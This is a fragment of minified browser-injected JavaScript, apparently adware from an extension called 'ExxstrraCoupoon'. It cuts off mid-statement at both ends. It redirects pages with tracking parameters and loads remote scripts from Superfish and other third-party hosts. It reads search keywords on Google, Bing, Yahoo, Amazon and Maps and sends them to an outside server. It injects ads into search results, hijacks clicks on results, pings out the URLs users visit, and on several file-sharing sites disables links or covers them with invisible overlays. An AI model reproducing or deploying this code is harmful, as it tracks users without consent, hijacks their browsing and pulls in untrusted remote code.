channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=rTa8vTsEqS5FpdgKrTVXrjnEqdk6qjU6qa%3D%3D&eid=721&hid=12403480529111048514&pid=0&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=pcom&userId=3764379739762384840&CTID=p0&partnername=ExxstrraCoupoon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1399/l.js?aoi=1311798366&pid=1399&zoneid=287609&ext=ExxstrraCoupoon&systemid=12403480529111048514&ext=ExxstrraCoupoon\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=721_0&hid=12403480529111048514&bname=ExxstrraCoupoon\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=721_0&hid=12403480529111048514&bname=ExxstrraCoupoon\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"ExxstrraCoupoon\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=12403480529111048514&eid=721&pid=0&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=CA&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\", dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a= b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\", \".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"), !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\", urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c= a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+ b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element: a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder= a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix)); if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl}, {replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c= 0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b= 0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k))return k;return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/, \"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom); if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node=b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"), c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a;if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\", function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c=__yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak(); b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name=a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name; b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&&\"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d, function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)};b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems? b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=12403480529111048514&eid=721&pid=0&prid=186\";\"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\"); e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\", b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}});;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\")&&document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild&&(document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild.onclick=function(){return!1});if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var f=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),g=document.createElement(\"div\");\ng.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");g.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';f.style.position=\"relative\";f.appendChild(g)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(f=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),g=document.createElement(\"div\"),g.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),\ng.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',f.style.position=\"relative\",f.appendChild(g))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var f=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\nf.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},g=document.createElement(\"script\");g.type=\"text/javascript\";g[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+f.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(g)}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{f=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),\n$(\"#mp3-with-trinity\").remove()}catch(f){}},-1< !navigator.userAgent.indexOf(\"chrome\")?f():(g=document.createElement(\"script\"),g.innerHTML=\"(\"+f.toString()+\")()\",document.body.appendChild(g))}catch(h){}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(f=document.createElement(\"img\"),f.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),f.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",\ng=document.getElementById(\"r1113566095\").parentNode,g.style.position=\"relative\",g.appendChild(f))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var f=[\"adv.php?\",\"/adv.php?\"],g=0;g<document.links.length;g++)for(var h=document.links[g],k=h.pathname+h.search,m=0;m<f.length;m++)f[m]==k.substr(0,f[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return 